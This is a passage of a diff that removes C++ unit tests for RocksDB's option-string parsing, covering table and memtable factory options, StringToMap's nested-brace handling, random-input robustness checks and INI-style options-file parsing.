-              "optimize_filters_for_hits=junk",
-              &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  // Nested plain table options
-  // Empty
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=10;max_write_buffer_number=16;"
-            "plain_table_factory={};arena_block_size=1024",
-            &new_cf_opt));
-  ASSERT_TRUE(new_cf_opt.table_factory != nullptr);
-  ASSERT_EQ(std::string(new_cf_opt.table_factory->Name()), "PlainTable");
-  // Non-empty
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=10;max_write_buffer_number=16;"
-            "plain_table_factory={user_key_len=66;bloom_bits_per_key=20;};"
-            "arena_block_size=1024",
-            &new_cf_opt));
-  ASSERT_TRUE(new_cf_opt.table_factory != nullptr);
-  ASSERT_EQ(std::string(new_cf_opt.table_factory->Name()), "PlainTable");
-
-  // memtable factory
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=10;max_write_buffer_number=16;"
-            "memtable=skip_list:10;arena_block_size=1024",
-            &new_cf_opt));
-  ASSERT_TRUE(new_cf_opt.memtable_factory != nullptr);
-  ASSERT_EQ(std::string(new_cf_opt.memtable_factory->Name()), "SkipListFactory");
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // GetBlockBasedTableOptionsFromString is not supported
-TEST_F(OptionsTest, GetBlockBasedTableOptionsFromString) {
-  BlockBasedTableOptions table_opt;
-  BlockBasedTableOptions new_opt;
-  // make sure default values are overwritten by something else
-  ASSERT_OK(GetBlockBasedTableOptionsFromString(table_opt,
-            "cache_index_and_filter_blocks=1;index_type=kHashSearch;"
-            "checksum=kxxHash;hash_index_allow_collision=1;no_block_cache=1;"
-            "block_cache=1M;block_cache_compressed=1k;block_size=1024;"
-            "block_size_deviation=8;block_restart_interval=4;"
-            "filter_policy=bloomfilter:4:true;whole_key_filtering=1;",
-            &new_opt));
-  ASSERT_TRUE(new_opt.cache_index_and_filter_blocks);
-  ASSERT_EQ(new_opt.index_type, BlockBasedTableOptions::kHashSearch);
-  ASSERT_EQ(new_opt.checksum, ChecksumType::kxxHash);
-  ASSERT_TRUE(new_opt.hash_index_allow_collision);
-  ASSERT_TRUE(new_opt.no_block_cache);
-  ASSERT_TRUE(new_opt.block_cache != nullptr);
-  ASSERT_EQ(new_opt.block_cache->GetCapacity(), 1024UL*1024UL);
-  ASSERT_TRUE(new_opt.block_cache_compressed != nullptr);
-  ASSERT_EQ(new_opt.block_cache_compressed->GetCapacity(), 1024UL);
-  ASSERT_EQ(new_opt.block_size, 1024UL);
-  ASSERT_EQ(new_opt.block_size_deviation, 8);
-  ASSERT_EQ(new_opt.block_restart_interval, 4);
-  ASSERT_TRUE(new_opt.filter_policy != nullptr);
-
-  // unknown option
-  ASSERT_NOK(GetBlockBasedTableOptionsFromString(table_opt,
-             "cache_index_and_filter_blocks=1;index_type=kBinarySearch;"
-             "bad_option=1",
-             &new_opt));
-  ASSERT_EQ(table_opt.cache_index_and_filter_blocks,
-            new_opt.cache_index_and_filter_blocks);
-  ASSERT_EQ(table_opt.index_type, new_opt.index_type);
-
-  // unrecognized index type
-  ASSERT_NOK(GetBlockBasedTableOptionsFromString(table_opt,
-             "cache_index_and_filter_blocks=1;index_type=kBinarySearchXX",
-             &new_opt));
-  ASSERT_EQ(table_opt.cache_index_and_filter_blocks,
-            new_opt.cache_index_and_filter_blocks);
-  ASSERT_EQ(table_opt.index_type, new_opt.index_type);
-
-  // unrecognized checksum type
-  ASSERT_NOK(GetBlockBasedTableOptionsFromString(table_opt,
-             "cache_index_and_filter_blocks=1;checksum=kxxHashXX",
-             &new_opt));
-  ASSERT_EQ(table_opt.cache_index_and_filter_blocks,
-            new_opt.cache_index_and_filter_blocks);
-  ASSERT_EQ(table_opt.index_type, new_opt.index_type);
-
-  // unrecognized filter policy name
-  ASSERT_NOK(GetBlockBasedTableOptionsFromString(table_opt,
-             "cache_index_and_filter_blocks=1;"
-             "filter_policy=bloomfilterxx:4:true",
-             &new_opt));
-  ASSERT_EQ(table_opt.cache_index_and_filter_blocks,
-            new_opt.cache_index_and_filter_blocks);
-  ASSERT_EQ(table_opt.filter_policy, new_opt.filter_policy);
-
-  // unrecognized filter policy config
-  ASSERT_NOK(GetBlockBasedTableOptionsFromString(table_opt,
-             "cache_index_and_filter_blocks=1;"
-             "filter_policy=bloomfilter:4",
-             &new_opt));
-  ASSERT_EQ(table_opt.cache_index_and_filter_blocks,
-            new_opt.cache_index_and_filter_blocks);
-  ASSERT_EQ(table_opt.filter_policy, new_opt.filter_policy);
-}
-#endif  // !ROCKSDB_LITE
-
-
-#ifndef ROCKSDB_LITE  // GetPlainTableOptionsFromString is not supported
-TEST_F(OptionsTest, GetPlainTableOptionsFromString) {
-  PlainTableOptions table_opt;
-  PlainTableOptions new_opt;
-  // make sure default values are overwritten by something else
-  ASSERT_OK(GetPlainTableOptionsFromString(table_opt,
-            "user_key_len=66;bloom_bits_per_key=20;hash_table_ratio=0.5;"
-            "index_sparseness=8;huge_page_tlb_size=4;encoding_type=kPrefix;"
-            "full_scan_mode=true;store_index_in_file=true",
-            &new_opt));
-  ASSERT_EQ(new_opt.user_key_len, 66);
-  ASSERT_EQ(new_opt.bloom_bits_per_key, 20);
-  ASSERT_EQ(new_opt.hash_table_ratio, 0.5);
-  ASSERT_EQ(new_opt.index_sparseness, 8);
-  ASSERT_EQ(new_opt.huge_page_tlb_size, 4);
-  ASSERT_EQ(new_opt.encoding_type, EncodingType::kPrefix);
-  ASSERT_TRUE(new_opt.full_scan_mode);
-  ASSERT_TRUE(new_opt.store_index_in_file);
-
-  // unknown option
-  ASSERT_NOK(GetPlainTableOptionsFromString(table_opt,
-             "user_key_len=66;bloom_bits_per_key=20;hash_table_ratio=0.5;"
-             "bad_option=1",
-             &new_opt));
-
-  // unrecognized EncodingType
-  ASSERT_NOK(GetPlainTableOptionsFromString(table_opt,
-             "user_key_len=66;bloom_bits_per_key=20;hash_table_ratio=0.5;"
-             "encoding_type=kPrefixXX",
-             &new_opt));
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // GetMemTableRepFactoryFromString is not supported
-TEST_F(OptionsTest, GetMemTableRepFactoryFromString) {
-  std::unique_ptr<MemTableRepFactory> new_mem_factory = nullptr;
-
-  ASSERT_OK(GetMemTableRepFactoryFromString("skip_list", &new_mem_factory));
-  ASSERT_OK(GetMemTableRepFactoryFromString("skip_list:16", &new_mem_factory));
-  ASSERT_EQ(std::string(new_mem_factory->Name()), "SkipListFactory");
-  ASSERT_NOK(GetMemTableRepFactoryFromString("skip_list:16:invalid_opt",
-                                             &new_mem_factory));
-
-  ASSERT_OK(GetMemTableRepFactoryFromString("prefix_hash", &new_mem_factory));
-  ASSERT_OK(GetMemTableRepFactoryFromString("prefix_hash:1000",
-                                            &new_mem_factory));
-  ASSERT_EQ(std::string(new_mem_factory->Name()), "HashSkipListRepFactory");
-  ASSERT_NOK(GetMemTableRepFactoryFromString("prefix_hash:1000:invalid_opt",
-                                             &new_mem_factory));
-
-  ASSERT_OK(GetMemTableRepFactoryFromString("hash_linkedlist",
-                                            &new_mem_factory));
-  ASSERT_OK(GetMemTableRepFactoryFromString("hash_linkedlist:1000",
-                                            &new_mem_factory));
-  ASSERT_EQ(std::string(new_mem_factory->Name()), "HashLinkListRepFactory");
-  ASSERT_NOK(GetMemTableRepFactoryFromString("hash_linkedlist:1000:invalid_opt",
-                                             &new_mem_factory));
-
-  ASSERT_OK(GetMemTableRepFactoryFromString("vector", &new_mem_factory));
-  ASSERT_OK(GetMemTableRepFactoryFromString("vector:1024", &new_mem_factory));
-  ASSERT_EQ(std::string(new_mem_factory->Name()), "VectorRepFactory");
-  ASSERT_NOK(GetMemTableRepFactoryFromString("vector:1024:invalid_opt",
-                                             &new_mem_factory));
-
-  ASSERT_NOK(GetMemTableRepFactoryFromString("cuckoo", &new_mem_factory));
-  ASSERT_OK(GetMemTableRepFactoryFromString("cuckoo:1024", &new_mem_factory));
-  ASSERT_EQ(std::string(new_mem_factory->Name()), "HashCuckooRepFactory");
-
-  ASSERT_NOK(GetMemTableRepFactoryFromString("bad_factory", &new_mem_factory));
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // GetOptionsFromString is not supported in RocksDB Lite
-TEST_F(OptionsTest, GetOptionsFromStringTest) {
-  Options base_options, new_options;
-  base_options.write_buffer_size = 20;
-  base_options.min_write_buffer_number_to_merge = 15;
-  BlockBasedTableOptions block_based_table_options;
-  block_based_table_options.cache_index_and_filter_blocks = true;
-  base_options.table_factory.reset(
-      NewBlockBasedTableFactory(block_based_table_options));
-  ASSERT_OK(GetOptionsFromString(
-      base_options,
-      "write_buffer_size=10;max_write_buffer_number=16;"
-      "block_based_table_factory={block_cache=1M;block_size=4;};"
-      "compression_opts=4:5:6;create_if_missing=true;max_open_files=1;"
-      "rate_limiter_bytes_per_sec=1024",
-      &new_options));
-
-  ASSERT_EQ(new_options.compression_opts.window_bits, 4);
-  ASSERT_EQ(new_options.compression_opts.level, 5);
-  ASSERT_EQ(new_options.compression_opts.strategy, 6);
-  ASSERT_EQ(new_options.compression_opts.max_dict_bytes, 0);
-  ASSERT_EQ(new_options.bottommost_compression, kDisableCompressionOption);
-  ASSERT_EQ(new_options.write_buffer_size, 10U);
-  ASSERT_EQ(new_options.max_write_buffer_number, 16);
-  BlockBasedTableOptions new_block_based_table_options =
-      dynamic_cast<BlockBasedTableFactory*>(new_options.table_factory.get())
-          ->table_options();
-  ASSERT_EQ(new_block_based_table_options.block_cache->GetCapacity(), 1U << 20);
-  ASSERT_EQ(new_block_based_table_options.block_size, 4U);
-  // don't overwrite block based table options
-  ASSERT_TRUE(new_block_based_table_options.cache_index_and_filter_blocks);
-
-  ASSERT_EQ(new_options.create_if_missing, true);
-  ASSERT_EQ(new_options.max_open_files, 1);
-  ASSERT_TRUE(new_options.rate_limiter.get() != nullptr);
-}
-
-TEST_F(OptionsTest, DBOptionsSerialization) {
-  Options base_options, new_options;
-  Random rnd(301);
-
-  // Phase 1: Make big change in base_options
-  test::RandomInitDBOptions(&base_options, &rnd);
-
-  // Phase 2: obtain a string from base_option
-  std::string base_options_file_content;
-  ASSERT_OK(GetStringFromDBOptions(&base_options_file_content, base_options));
-
-  // Phase 3: Set new_options from the derived string and expect
-  //          new_options == base_options
-  ASSERT_OK(GetDBOptionsFromString(DBOptions(), base_options_file_content,
-                                   &new_options));
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(base_options, new_options));
-}
-
-TEST_F(OptionsTest, ColumnFamilyOptionsSerialization) {
-  ColumnFamilyOptions base_opt, new_opt;
-  Random rnd(302);
-  // Phase 1: randomly assign base_opt
-  // custom type options
-  test::RandomInitCFOptions(&base_opt, &rnd);
-
-  // Phase 2: obtain a string from base_opt
-  std::string base_options_file_content;
-  ASSERT_OK(
-      GetStringFromColumnFamilyOptions(&base_options_file_content, base_opt));
-
-  // Phase 3: Set new_opt from the derived string and expect
-  //          new_opt == base_opt
-  ASSERT_OK(GetColumnFamilyOptionsFromString(
-      ColumnFamilyOptions(), base_options_file_content, &new_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_opt, new_opt));
-  if (base_opt.compaction_filter) {
-    delete base_opt.compaction_filter;
-  }
-}
-
-#endif  // !ROCKSDB_LITE
-
-Status StringToMap(
-    const std::string& opts_str,
-    std::unordered_map<std::string, std::string>* opts_map);
-
-#ifndef ROCKSDB_LITE  // StringToMap is not supported in ROCKSDB_LITE
-TEST_F(OptionsTest, StringToMapTest) {
-  std::unordered_map<std::string, std::string> opts_map;
-  // Regular options
-  ASSERT_OK(StringToMap("k1=v1;k2=v2;k3=v3", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "v2");
-  ASSERT_EQ(opts_map["k3"], "v3");
-  // Value with '='
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1==v1;k2=v2=;", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "=v1");
-  ASSERT_EQ(opts_map["k2"], "v2=");
-  // Overwrriten option
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k1=v2;k3=v3", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v2");
-  ASSERT_EQ(opts_map["k3"], "v3");
-  // Empty value
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2=;k3=v3;k4=", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_TRUE(opts_map.find("k2") != opts_map.end());
-  ASSERT_EQ(opts_map["k2"], "");
-  ASSERT_EQ(opts_map["k3"], "v3");
-  ASSERT_TRUE(opts_map.find("k4") != opts_map.end());
-  ASSERT_EQ(opts_map["k4"], "");
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2=;k3=v3;k4=   ", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_TRUE(opts_map.find("k2") != opts_map.end());
-  ASSERT_EQ(opts_map["k2"], "");
-  ASSERT_EQ(opts_map["k3"], "v3");
-  ASSERT_TRUE(opts_map.find("k4") != opts_map.end());
-  ASSERT_EQ(opts_map["k4"], "");
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2=;k3=", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_TRUE(opts_map.find("k2") != opts_map.end());
-  ASSERT_EQ(opts_map["k2"], "");
-  ASSERT_TRUE(opts_map.find("k3") != opts_map.end());
-  ASSERT_EQ(opts_map["k3"], "");
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2=;k3=;", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_TRUE(opts_map.find("k2") != opts_map.end());
-  ASSERT_EQ(opts_map["k2"], "");
-  ASSERT_TRUE(opts_map.find("k3") != opts_map.end());
-  ASSERT_EQ(opts_map["k3"], "");
-  // Regular nested options
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2={nk1=nv1;nk2=nv2};k3=v3", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "nk1=nv1;nk2=nv2");
-  ASSERT_EQ(opts_map["k3"], "v3");
-  // Multi-level nested options
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2={nk1=nv1;nk2={nnk1=nnk2}};"
-                        "k3={nk1={nnk1={nnnk1=nnnv1;nnnk2;nnnv2}}};k4=v4",
-                        &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "nk1=nv1;nk2={nnk1=nnk2}");
-  ASSERT_EQ(opts_map["k3"], "nk1={nnk1={nnnk1=nnnv1;nnnk2;nnnv2}}");
-  ASSERT_EQ(opts_map["k4"], "v4");
-  // Garbage inside curly braces
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2={dfad=};k3={=};k4=v4",
-                        &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "dfad=");
-  ASSERT_EQ(opts_map["k3"], "=");
-  ASSERT_EQ(opts_map["k4"], "v4");
-  // Empty nested options
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2={};", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "");
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2={{{{}}}{}{}};", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "{{{}}}{}{}");
-  // With random spaces
-  opts_map.clear();
-  ASSERT_OK(StringToMap("  k1 =  v1 ; k2= {nk1=nv1; nk2={nnk1=nnk2}}  ; "
-                        "k3={  {   } }; k4= v4  ",
-                        &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "nk1=nv1; nk2={nnk1=nnk2}");
-  ASSERT_EQ(opts_map["k3"], "{   }");
-  ASSERT_EQ(opts_map["k4"], "v4");
-
-  // Empty key
-  ASSERT_NOK(StringToMap("k1=v1;k2=v2;=", &opts_map));
-  ASSERT_NOK(StringToMap("=v1;k2=v2", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2v2;", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2=v2;fadfa", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2=v2;;", &opts_map));
-  // Mismatch curly braces
-  ASSERT_NOK(StringToMap("k1=v1;k2={;k3=v3", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{};k3=v3", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={}};k3=v3", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{}{}}};k3=v3", &opts_map));
-  // However this is valid!
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2=};k3=v3", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "}");
-  ASSERT_EQ(opts_map["k3"], "v3");
-
-  // Invalid chars after closing curly brace
-  ASSERT_NOK(StringToMap("k1=v1;k2={{}}{};k3=v3", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{}}cfda;k3=v3", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{}}  cfda;k3=v3", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{}}  cfda", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{}}{}", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{dfdl}adfa}{}", &opts_map));
-}
-#endif  // ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // StringToMap is not supported in ROCKSDB_LITE
-TEST_F(OptionsTest, StringToMapRandomTest) {
-  std::unordered_map<std::string, std::string> opts_map;
-  // Make sure segfault is not hit by semi-random strings
-
-  std::vector<std::string> bases = {
-      "a={aa={};tt={xxx={}}};c=defff",
-      "a={aa={};tt={xxx={}}};c=defff;d={{}yxx{}3{xx}}",
-      "abc={{}{}{}{{{}}}{{}{}{}{}{}{}{}"};
-
-  for (std::string base : bases) {
-    for (int rand_seed = 301; rand_seed < 401; rand_seed++) {
-      Random rnd(rand_seed);
-      for (int attempt = 0; attempt < 10; attempt++) {
-        std::string str = base;
-        // Replace random position to space
-        size_t pos = static_cast<size_t>(
-            rnd.Uniform(static_cast<int>(base.size())));
-        str[pos] = ' ';
-        Status s = StringToMap(str, &opts_map);
-        ASSERT_TRUE(s.ok() || s.IsInvalidArgument());
-        opts_map.clear();
-      }
-    }
-  }
-
-  // Random Construct a string
-  std::vector<char> chars = {'{', '}', ' ', '=', ';', 'c'};
-  for (int rand_seed = 301; rand_seed < 1301; rand_seed++) {
-    Random rnd(rand_seed);
-    int len = rnd.Uniform(30);
-    std::string str = "";
-    for (int attempt = 0; attempt < len; attempt++) {
-      // Add a random character
-      size_t pos = static_cast<size_t>(
-          rnd.Uniform(static_cast<int>(chars.size())));
-      str.append(1, chars[pos]);
-    }
-    Status s = StringToMap(str, &opts_map);
-    ASSERT_TRUE(s.ok() || s.IsInvalidArgument());
-    s = StringToMap("name=" + str, &opts_map);
-    ASSERT_TRUE(s.ok() || s.IsInvalidArgument());
-    opts_map.clear();
-  }
-}
-
-TEST_F(OptionsTest, GetStringFromCompressionType) {
-  std::string res;
-
-  ASSERT_OK(GetStringFromCompressionType(&res, kNoCompression));
-  ASSERT_EQ(res, "kNoCompression");
-
-  ASSERT_OK(GetStringFromCompressionType(&res, kSnappyCompression));
-  ASSERT_EQ(res, "kSnappyCompression");
-
-  ASSERT_OK(GetStringFromCompressionType(&res, kDisableCompressionOption));
-  ASSERT_EQ(res, "kDisableCompressionOption");
-
-  ASSERT_OK(GetStringFromCompressionType(&res, kLZ4Compression));
-  ASSERT_EQ(res, "kLZ4Compression");
-
-  ASSERT_OK(GetStringFromCompressionType(&res, kZlibCompression));
-  ASSERT_EQ(res, "kZlibCompression");
-
-  ASSERT_NOK(
-      GetStringFromCompressionType(&res, static_cast<CompressionType>(-10)));
-}
-#endif  // !ROCKSDB_LITE
-
-TEST_F(OptionsTest, ConvertOptionsTest) {
-  LevelDBOptions leveldb_opt;
-  Options converted_opt = ConvertOptions(leveldb_opt);
-
-  ASSERT_EQ(converted_opt.create_if_missing, leveldb_opt.create_if_missing);
-  ASSERT_EQ(converted_opt.error_if_exists, leveldb_opt.error_if_exists);
-  ASSERT_EQ(converted_opt.paranoid_checks, leveldb_opt.paranoid_checks);
-  ASSERT_EQ(converted_opt.env, leveldb_opt.env);
-  ASSERT_EQ(converted_opt.info_log.get(), leveldb_opt.info_log);
-  ASSERT_EQ(converted_opt.write_buffer_size, leveldb_opt.write_buffer_size);
-  ASSERT_EQ(converted_opt.max_open_files, leveldb_opt.max_open_files);
-  ASSERT_EQ(converted_opt.compression, leveldb_opt.compression);
-
-  std::shared_ptr<TableFactory> tb_guard = converted_opt.table_factory;
-  BlockBasedTableFactory* table_factory =
-      dynamic_cast<BlockBasedTableFactory*>(converted_opt.table_factory.get());
-
-  ASSERT_TRUE(table_factory != nullptr);
-
-  const BlockBasedTableOptions table_opt = table_factory->table_options();
-
-  ASSERT_EQ(table_opt.block_cache->GetCapacity(), 8UL << 20);
-  ASSERT_EQ(table_opt.block_size, leveldb_opt.block_size);
-  ASSERT_EQ(table_opt.block_restart_interval,
-            leveldb_opt.block_restart_interval);
-  ASSERT_EQ(table_opt.filter_policy.get(), leveldb_opt.filter_policy);
-}
-
-#ifndef ROCKSDB_LITE
-class OptionsParserTest : public testing::Test {
- public:
-  OptionsParserTest() { env_.reset(new test::StringEnv(Env::Default())); }
-
- protected:
-  std::unique_ptr<test::StringEnv> env_;
-};
-
-TEST_F(OptionsParserTest, Comment) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[ DBOptions ]\n"
-      "  # note that we don't support space around \"=\"\n"
-      "  max_open_files=12345;\n"
-      "  max_background_flushes=301  # comment after a statement is fine\n"
-      "  # max_background_flushes=1000  # this line would be ignored\n"
-      "  # max_background_compactions=2000 # so does this one\n"
-      "  max_total_wal_size=1024  # keep_log_file_num=1000\n"
-      "[CFOptions   \"default\"]  # column family must be specified\n"
-      "                     # in the correct order\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_OK(parser.Parse(kTestFileName, env_.get()));
-
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(*parser.db_opt(), db_opt));
-  ASSERT_EQ(parser.NumColumnFamilies(), 1U);
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(
-      *parser.GetCFOptions("default"), cf_opt));
-}
-
-TEST_F(OptionsParserTest, ExtraSpace) {
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[      Version   ]\n"
-      "  rocksdb_version     = 3.14.0      \n"
-      "  options_file_version=1   # some comment\n"
-      "[DBOptions  ]  # some comment\n"
-      "max_open_files=12345   \n"
-      "    max_background_flushes   =    301   \n"
-      " max_total_wal_size     =   1024  # keep_log_file_num=1000\n"
-      "        [CFOptions      \"default\"     ]\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_OK(parser.Parse(kTestFileName, env_.get()));
-}
-
-TEST_F(OptionsParserTest, MissingDBOptions) {
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[CFOptions \"default\"]\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_NOK(parser.Parse(kTestFileName, env_.get()));
-}
-
-TEST_F(OptionsParserTest, DoubleDBOptions) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[DBOptions]\n"
-      "  max_open_files=12345\n"
-      "  max_background_flushes=301\n"
-      "  max_total_wal_size=1024  # keep_log_file_num=1000\n"
-      "[DBOptions]\n"
-      "[CFOptions \"default\"]\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_NOK(parser.Parse(kTestFileName, env_.get()));
-}
-
-TEST_F(OptionsParserTest, NoDefaultCFOptions) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[DBOptions]\n"
-      "  max_open_files=12345\n"
-      "  max_background_flushes=301\n"
-      "  max_total_wal_size=1024  # keep_log_file_num=1000\n"
-      "[CFOptions \"something_else\"]\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_NOK(parser.Parse(kTestFileName, env_.get()));
-}
-
-TEST_F(OptionsParserTest, DefaultCFOptionsMustBeTheFirst) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[DBOptions]\n"
-      "  max_open_files=12345\n"
-      "  max_background_flushes=301\n"
-      "  max_total_wal_size=1024  # keep_log_file_num=1000\n"
-      "[CFOptions \"something_else\"]\n"
-      "  # if a section is blank, we will use the default\n"
-      "[CFOptions \"default\"]\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_NOK(parser.Parse(kTestFileName, env_.get()));
-}
-
-TEST_F(OptionsParserTest, DuplicateCFOptions) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[DBOptions]\n"
-      "  max_open_files=12345\n"
-      "  max_background_flushes=301\n"
-      "  max_total_wal_size=1024  # keep_log_file_num=1000\n"
-      "[CFOptions \"default\"]\n"
-      "[CFOptions \"something_else\"]\n"
-      "[CFOptions \"something_else\"]\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_NOK(parser.Parse(kTestFileName, env_.get()));
-}
-
-TEST_F(OptionsParserTest, IgnoreUnknownOptions) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[DBOptions]\n"
-      "  max_open_files=12345\n"
-      "  max_background_flushes=301\n"
-      "  max_total_wal_size=1024  # keep_log_file_num=1000\n"
-      "  unknown_db_option1=321\n"
-      "  unknown_db_option2=false\n"
-      "[CFOptions \"default\"]\n"
-      "  unknown_cf_option1=hello\n"
-      "[CFOptions \"something_else\"]\n"
-      "  unknown_cf_option2=world\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_NOK(parser.Parse(kTestFileName, env_.get()));
